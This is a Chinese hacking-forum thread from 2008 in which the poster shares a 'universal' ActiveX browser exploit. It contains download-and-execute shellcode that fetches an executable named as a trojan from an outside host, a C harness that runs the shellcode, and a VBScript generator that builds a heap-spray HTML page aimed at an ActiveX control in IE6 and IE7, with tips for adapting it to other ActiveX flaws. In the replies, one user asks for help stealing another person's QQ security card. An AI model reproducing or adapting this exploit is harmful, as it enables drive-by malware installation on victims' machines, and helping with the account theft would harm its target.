★我要吧★

 找回密码
 注册[Register]
搜索
qq空间相册密码查看为什么登陆后需要激活无法注册?

ActiveX漏洞通用Exploit

[复制链接]
发表于 2008-4-14 13:45:42 | 显示全部楼层 |阅读模式
终于在milw0rm找到了一个不错的shellcode,down&exec的,灰常好用!顺手写了一个C测试了下,结果是成功下载并执行了"木马",muma.exe是我用delphi写的一个简单的执行测试程序,无毒无害。
  1. #include <stdio.h>
  2. #include <string.h>

  3. unsigned char shellcode[] =
  4. "\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03"
  5. "\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74"
  6. "\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E"
  7. "\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03"
  8. "\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C"
  9. "\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40"
  10. "\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C"
  11. "\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC"
  12. "\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F"
  13. "\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB"
  14. "\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83"
  15. "\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF"
  16. "\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF"
  17. "http://fenggou.net/muma.exe";

  18. int main()
  19. {
  20. void (* code)(); //把ShellCode转换成一个参数为空,返回为空的函数指针,并调用
  21. * (int *) & code = shellcode;
  22. code();
  23. }
复制代码
在学习ActiveX的时候读过联众的AX漏洞生成器,思路不错,但不知道什么原因,那个生成器的shellcode我并不能执行成功,索性将其shellcode与heap spray方法暴力分配内存的JS进行了修改,反正在我本机测试100%成功,XP SP2 IE6&IE7。
  1. exeurl = InputBox( "Please input you want down&exec url:", "输入","http://fenggou.net/muma.exe" )
  2. if exeurl <> "" then
  3. code="\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF"&Unicode(exeurl&Chr(00)&Chr(00))
  4. Function Unicode(str1)
  5. Dim str,temp
  6. str = ""
  7. For i=1 to len(str1)
  8. temp = Hex(AscW(Mid(str1,i,1)))
  9. If len(temp) < 5 Then temp = right("0000"&temp, 2)
  10. str = str & "\x" & temp
  11. Next
  12. Unicode = str
  13. End Function
  14. function replaceregex(str)
  15. set regex=new regExp
  16. regex.pattern="\\x(..)\\x(..)"
  17. regex.IgnoreCase=true
  18. regex.global=true
  19. matches=regex.replace(str,"%u$2$1")
  20. replaceregex=matches
  21. end Function
  22. set fso=createObject("scripting.filesystemobject")
  23. if fso.FileExists("fenggou.htm") then
  24. fso.deleteFile "fenggou.htm",True
  25. end If
  26. set fileS=fso.opentextfile("fenggou.htm",8,true)
  27. fileS.writeline "<html>"
  28. fileS.writeline "<title>Sina</title>"
  29. fileS.writeline "<object classid=""clsid:8EF2A07C-6E69-4144-96AA-2247D892A73D"" id=’target’></object>"
  30. fileS.writeline "<body>"
  31. fileS.writeline "<SCRIPT language=""JavaScript"">"
  32. fileS.writeline "var shellcode = unescape("""&replaceregex(code)&""");"
  33. fileS.writeline "var bigblock = unescape(""%u9090%u9090"");"
  34. fileS.writeline "var headersize = 20;"
  35. fileS.writeline "var slackspace = headersize+shellcode.length;"
  36. fileS.writeline "while (bigblock.length<slackspace) bigblock+=bigblock;"
  37. fileS.writeline "fillblock = bigblock.substring(0, slackspace);"
  38. fileS.writeline "block = bigblock.substring(0, bigblock.length-slackspace);"
  39. fileS.writeline "while(block.length+slackspace<0x40000) block = block+block+fillblock;"
  40. fileS.writeline "memory = new Array();"
  41. fileS.writeline "for (x=0; x<300; x++) memory[x] = block +shellcode;"
  42. fileS.writeline "var buffer = ’’;"
  43. fileS.writeline "while (buffer.length < 218) buffer+=’\x0a\x0a\x0a\x0a’;"
  44. fileS.writeline "target.Method1(buffer);"
  45. fileS.writeline "</script>"
  46. fileS.writeline "</body>"
  47. fileS.writeline "</html>"
  48. files.Close
  49. Set fso=nothing
  50. end if
复制代码
仍然使用VBS,修改成其他漏洞exp的时候修改buffer长度,与漏洞AX的classid与参数传递方法即可:)
发表于 2009-4-14 20:42:52 | 显示全部楼层
谢谢分享
发表于 2009-5-12 09:26:09 | 显示全部楼层
快速回复主题


用软件刷者,直接封号

发表于 2009-5-12 10:10:35 | 显示全部楼层
晕。这是不是应该删了。
LS的那家伙在搞什么。
LZ写的这个有效果么?
试试看。:Q :Q
头像被屏蔽
发表于 2009-9-25 16:47:14 | 显示全部楼层
哇,,只是我不懂
发表于 2009-9-30 03:34:43 | 显示全部楼层
日他妈,前几天别人,还是腾讯···吧我QQ地下城装备材料金币全洗,价值人民币500多,
····伤心现在知道个游戏骗子QQ想盗他密保卡,密保卡在QQ相册里,也不知道咋闹????~~~~~~~~~没闹过    不会
发表于 2009-9-30 03:42:17 | 显示全部楼层
求个能帮我的    谢谢!!!
QQ 120314570
发表于 2009-10-5 02:13:01 | 显示全部楼层
xiexie 谢谢啊
发表于 2009-10-5 21:31:36 | 显示全部楼层
可以用吗???:'(
发表于 2009-10-13 23:29:45 | 显示全部楼层
[quote][/quote]是啊,真的可以用吗?
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

QQ|手机版|小黑屋|☆我要吧☆ ( 豫ICP备13016831号-1 )

GMT+8, 2024-12-23 23:12 , Processed in 0.134939 second(s), 23 queries .

Powered by abc369 X3.4

© 2001-2023 abc369.

快速回复 返回顶部 返回列表